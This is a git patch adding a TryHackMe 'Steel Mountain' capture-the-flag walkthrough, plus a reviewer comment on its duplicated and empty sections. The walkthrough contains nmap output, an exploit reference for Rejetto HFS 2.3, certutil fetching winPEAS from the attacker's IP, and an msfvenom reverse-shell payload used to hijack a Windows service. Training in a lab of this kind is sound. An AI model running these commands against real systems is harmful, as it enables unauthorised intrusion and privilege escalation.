From 7c15fbc4333f48a67cdbf6e3f0e959072cff7c2b Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Tue, 27 Oct 2020 02:51:49 +0500 Subject: [PATCH] Add files via upload --- TryHackMe/steel_mountain.md | 227 ++++++++++++++++++++++++++++++++++++ 1 file changed, 227 insertions(+) create mode 100644 TryHackMe/steel_mountain.md diff --git a/TryHackMe/steel_mountain.md b/TryHackMe/steel_mountain.md new file mode 100644 index 0000000..db14b58 --- /dev/null +++ b/TryHackMe/steel_mountain.md 
@@ -0,0 +1,227 @@ +#TryHackMe-Steel Mountain + +## NMAP + +``` +Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT [13/93] +Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan +NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining) +Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan +NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining) +Nmap scan report for 10.10.252.157 +Host is up (0.18s latency). +Not shown: 988 closed ports +PORT STATE SERVICE VERSION +80/tcp open http Microsoft IIS httpd 8.5 +| http-methods: +|_ Potentially risky methods: TRACE +|_http-server-header: Microsoft-IIS/8.5 +|_http-title: Site doesn't have a title (text/html). +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds +3389/tcp open ssl/ms-wbt-server? +|_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time. +8080/tcp open http HttpFileServer httpd 2.3 +|_http-server-header: HFS 2.3 +|_http-title: HFS / +49152/tcp open msrpc Microsoft Windows RPC +49153/tcp open msrpc Microsoft Windows RPC +49154/tcp open msrpc Microsoft Windows RPC +49155/tcp open msrpc Microsoft Windows RPC +49156/tcp open msrpc Microsoft Windows RPC +49163/tcp open msrpc Microsoft Windows RPC +Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows + +Host script results: +|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown) +|_smb-os-discovery: ERROR: Script execution failed (use -d to debug) +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2020-10-26T18:26:30 +|_ start_date: 2020-10-26T18:21:06 + +``` + +## PORT 80 + +`Who is the 
employee of the month?` + +Visit the web page on port 80 then look at the source of the web page and you'll image name which is the answer to the question. + + + + + +`Scan the machine with nmap. What is the other port running a web server on?` + +PORT 8080 + + +## PORT 8080 + + + + +Clicking below at the link `HttpFileServer 2.3` will redirect you to a page + + + +`Take a look at the other web server. What file server is running?` + +Rejetto Http File Server + +`What is the CVE number to exploit this file server?` + +## Searchsploit + +Now we know that it's using Rejetto Http File Server version 2.3 so let's find exploits for it + + + +Let's try using this exploit + +https://www.exploit-db.com/exploits/39161 + + + +Change the local IP and local port if you want doesn't matter if you use the default `443` port in this exploit + + + +Now host the `nc.exe` on you local machine which can be downloaded from github `https://github.com/int0x33/nc.exe/blob/master/nc.exe` or if your using kali linux then it will be available to `/usr/share/windows-resources/binaries/nc.exe` + +Hosting this file can be through python but remember to keep the port on `80` because that's the default port that http listens on + +`python3 -m http.server 80` + +Also set up a net cat listener `nc -lvp [port]` + +Run the exploit with python2 39161 8080 + + + +Run it again because the first time you ran it just downloaded it but now when you run this exploit again it will execute `nc.exe` + + + +Now upload `winPEAS.exe` on the machine for that host that file locally then download it on targeted machine + +``` +C:\Users\bill\Desktop>certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe +certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe +**** Online **** +CertUtil: -URLCache command completed successfully. + +C:\Users\bill\Desktop>dir +dir + Volume in drive C has no label. 
+ Volume Serial Number is 2E4A-906A + + Directory of C:\Users\bill\Desktop + +10/26/2020 02:31 PM . +10/26/2020 02:31 PM .. +10/26/2020 01:57 PM 600,580 PowerUp.ps1 +09/27/2019 05:42 AM 70 user.txt +10/26/2020 02:31 PM 472,064 winpeas.exe + 3 File(s) 1,072,714 bytes + 2 Dir(s) 44,155,019,264 bytes free + +C:\Users\bill\Desktop> +``` +Now by simply typing .\winpeas.exe + + + +We can see that this services can be exploited so let's generate a payload named as `ASCService.exe` + +``` +msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe +``` +Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again + +### Stoppping the service + +``` + +C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9 +sc stop AdvancedSystemCareService9 + +SERVICE_NAME: AdvancedSystemCareService9 + TYPE : 110 WIN32_OWN_PROCESS (interactive) + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +``` +### Starting the service + + + + + + +## Metasploit + + + + + +No we want to escalate our root privileges so we will run `Powerup.ps1` powershell script to look for misconfigurations on targeted windows machine + + + +To enter into powershell first write `load powershell` then `powershell_shell` + + + +Run `. 
.\PowerUp.ps1` and `Invoke-AllChecks` + + + +Now check for service having `canRestart` set to True + + + +And name of the service is `AdvancedSystemCareService9` + +Now generate a payload with name `ASCService.exe` + +``` +msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe +``` +Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again + +### Stoppping the service + +``` + +C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9 +sc stop AdvancedSystemCareService9 + +SERVICE_NAME: AdvancedSystemCareService9 + TYPE : 110 WIN32_OWN_PROCESS (interactive) + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +``` +### Starting the service + + + +
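Review bot: the payload-generation and service-stop block is duplicated verbatim in this hunk, once after the winPEAS run and again after the `Invoke-AllChecks` step, and both `### Starting the service` headings are empty, so the write-up never shows the step that actually restarts the service. Keep one copy of the `msfvenom ... -o ASCService.exe` / `sc stop AdvancedSystemCareService9` section, and either put the corresponding `sc start` command under a single "Starting the service" heading or drop the empty heading. Smaller points in the same hunk: `### Stoppping the service` has a typo; the nmap output line `Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT [13/93]` carries a `[13/93]` terminal-scrollback artifact that is not part of the scan; and several sentences are missing words ("you'll image name which is the answer", "Change the local IP and local port if you want doesn't matter", "if your using kali linux"). Since the notes are written from the `bill` shell, it would also help readers to say explicitly that the "Metasploit" section starts from the same foothold rather than a new one.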